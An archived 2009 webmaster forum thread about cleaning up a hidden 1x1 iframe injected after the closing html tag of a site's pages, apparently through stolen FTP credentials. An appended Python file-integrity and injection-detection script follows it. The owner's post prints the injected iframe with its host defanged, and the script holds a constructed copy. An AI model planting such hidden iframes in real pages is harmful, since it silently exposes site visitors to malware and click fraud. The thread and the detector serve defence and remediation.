we've been injected!


RainForest
05-06-2009, 11:54 PM
Hello,

Totally by accident, I discovered today that one of my sites has had some code injected onto several pages into an iframe that was placed after the closing html tag.

I've uploaded clean pages over the infected ones, and they are clean - at least for the moment...

My question is: does anyone know of any way to prevent this from happening again?

Thanks.

edbr
05-07-2009, 02:26 AM
More detail, but why is the iframe after the closing html tag?

RainForest
05-07-2009, 03:57 PM
More detail, but why is the iframe after the closing html tag?

I have no idea about why the iframe was placed where it was. I don't know anything about iframes, and this is the first time I've had to sanitize pages on a site. But I'm wondering if perhaps the code was *misplaced*, and the misplacement actually worked in our favor to keep the site safe because even though the code includes "click", there was no way to actually click on it...unless that's totally irrelevant. I found it through Firefox's NoScript add-on which alerted me about the unknown script, and that got me started researching what was going on.

Note that when I copied the source code for my evidence file, I inadvertently tried to save it as an html file instead of into a txt file (oops), and my AV program hit on it, so the code is definitely a nasty.

More detail: Here are the bottom lines of my code including the nastiness, whose link I've sanitized to "klaomta dot com":

<!-- end #footer --></div>
<!-- end #container --></div>
</body>
<!-- InstanceEnd --></html>
<iframe src="http://klaomta dot com/?click=CDF2B7" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

edbr
05-08-2009, 12:23 AM
Yup, it's malicious; I trusted my virus software.
If you are sure it wasn't put there by the site authors, I would get on to my hoster, as this is a security breach. I would also consider changing any FTP account passwords and checking there is not a rogue one set up.

RainForest
05-08-2009, 02:28 PM
If you are sure it wasn't put there by the site authors
Um, isn't that me?

I would get on to my hoster, as this is a security breach. I would also consider changing any FTP account passwords and checking there is not a rogue one set up.
You're right on the money with this. I had contacted the host the day I discovered the infection (Wed). They called me back yesterday (Thurs). One of their "developers" (I'm not sure what they mean by using that term - aren't we all developers, as website designers/creators?) compromised the server. Again, I'm unclear on exactly what the kid I was talking to meant, but I think what happened was that somebody who was infected logged on through FTP to upload files, and the worm was uploaded, too.

Apparently it infected only a few sites on the host, and one of those sites happened to be us. I discovered the infection occurred on 5/2 at 4:44, based on the time that the files were changed on the server. So we were infected for 4 days before I discovered the problem.

What I was told - and I believe it - is that this worm stole FTP passwords to generate web traffic. That explains the "click" in the code, as well as the "openstats.info" javascript that wanted to run, *and* the marketing malware that suddenly appeared on the laptop I use for working on the website.

What I've done is cleaned up the malware on the laptop, overwrote the dirty files with clean ones, changed my FTP password (host assures no rogue accts), and posted an alert on our site advising visitors to run a scan if they were on the site during the affected days.

I believe it's a site owner's responsibility to inform their visitors any time there's been a breach. And not to stand on a soapbox too long, but all these companies that suffer data breaches and make no effort to inform their customers really p*** me off. Everybody has the right to know if they've potentially been compromised.

So we're back to the original question - any way to prevent this? And since I discovered the infection by accident, what, should I now be checking my sites every week to make sure they're clean??? What a mess...

domedia
05-08-2009, 03:20 PM
One of their "developers" (I'm not sure what they mean by using that term - aren't we all developers, as website designers/creators?) compromised the server.
Real estate developers, system developers, web developers... all different ;)


So we're back to the original question - any way to prevent this? And since I discovered the infection by accident, what, should I now be checking my sites every week to make sure they're clean??? What a mess...
Make sure you've protected your machine properly and ask your host what they've done on their end to minimize the risk for this happening again.

RainForest
05-08-2009, 05:35 PM
Then I'm done.

Later, guys!

edbr
05-09-2009, 04:24 AM
Um, isn't that me?
How am I to know?
I would definitely change FTP passwords often, and check logs for file updates rather than physically check sites.
I think an app could be made to inform you of file updates by e-mail too, but personally I would move hoster; it doesn't sound like great security or response in the circumstances.

coloeagle
05-10-2009, 01:33 PM
We've had a similar discussion on another forum (yah, I'm a two-timer lol)
Thought I would share this script a member there shared. Doesn't stop your site from getting hacked, but it will notify you: http://www.dazzlindonna.com/blog/2009/03/23/new-tool-to-help-fight-web-site-hackers/
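edbr's suggestion (watch for file updates rather than eyeballing the pages) and coloeagle's notification script come down to the same defensive control: keep a baseline of the site's files and raise an alert when anything is added, removed or modified. The following Python script is an added example, not code from any poster or from the linked tool. It hashes every web file under a directory, diffs the result against a saved baseline, and additionally flags the exact pattern RainForest found: non-whitespace content after the closing </html> tag and a hidden 1x1 iframe. The sample pages and the `example.invalid` host are constructed for the demo; the `demo()` function builds a throwaway site, takes the baseline, simulates the tampering on one page and rescans.

```python
import hashlib
import json
import re
import tempfile
from pathlib import Path

# Constructed sample pages for the demo. CLEAN_PAGE mirrors the tail of a
# Dreamweaver-template page; INJECTED_PAGE appends a hidden iframe after
# </html>, as in the thread. example.invalid is a placeholder, not an IoC.
CLEAN_PAGE = """<html><body>
<div id="container"><div id="footer">
<!-- end #footer --></div>
<!-- end #container --></div>
</body>
<!-- InstanceEnd --></html>
"""
INJECTED_PAGE = CLEAN_PAGE + (
    '<iframe src="http://example.invalid/?click=PLACEHOLDER" width=1 height=1 '
    'style="visibility:hidden;position:absolute"></iframe>\n'
)

# Anything other than whitespace after the final </html> is suspicious.
TRAILING_CONTENT = re.compile(r"</html>\s*(\S.*)$", re.IGNORECASE | re.DOTALL)
# An iframe that is hidden via CSS or sized to 0/1 pixel wide.
HIDDEN_IFRAME = re.compile(
    r"""<iframe[^>]*(visibility:\s*hidden|width=['"]?[01]['"]?(?![0-9]))""",
    re.IGNORECASE,
)


def sha256_file(path: Path) -> str:
    """Stream a file through SHA-256 so large assets do not need to fit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(root: Path, exts=(".html", ".htm", ".php", ".js")) -> dict:
    """Map each web file (path relative to root) to its SHA-256 digest."""
    return {
        str(p.relative_to(root)): sha256_file(p)
        for p in sorted(root.rglob("*"))
        if p.is_file() and p.suffix.lower() in exts
    }


def diff_snapshots(baseline: dict, current: dict) -> dict:
    """Report files added, removed or modified since the baseline was taken."""
    common = baseline.keys() & current.keys()
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in common if baseline[p] != current[p]),
    }


def find_injection(html: str) -> list:
    """Return human-readable reasons a page looks tampered with (empty if clean)."""
    findings = []
    m = TRAILING_CONTENT.search(html)
    if m:
        findings.append("content after closing </html>: " + m.group(1).strip()[:80])
    if HIDDEN_IFRAME.search(html):
        findings.append("hidden or 1x1 iframe present")
    return findings


def scan_site(root: Path, baseline: dict) -> dict:
    """Integrity diff plus content heuristics on every new or changed file."""
    report = diff_snapshots(baseline, snapshot(root))
    report["suspicious"] = {}
    for rel in report["added"] + report["modified"]:
        findings = find_injection((root / rel).read_text(errors="replace"))
        if findings:
            report["suspicious"][rel] = findings
    return report


def demo() -> dict:
    """Build the constructed site, baseline it, tamper with one page, rescan."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "index.html").write_text(CLEAN_PAGE)
        (root / "about.html").write_text(CLEAN_PAGE)
        baseline = snapshot(root)          # in practice: store this off-server
        (root / "index.html").write_text(INJECTED_PAGE)  # simulated tampering
        return scan_site(root, baseline)


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Run it from cron against the document root and mail the JSON report whenever `added`, `removed`, `modified` or `suspicious` is non-empty. Keep the baseline somewhere the FTP account cannot write, otherwise an attacker who has the FTP password can rewrite the baseline along with the pages.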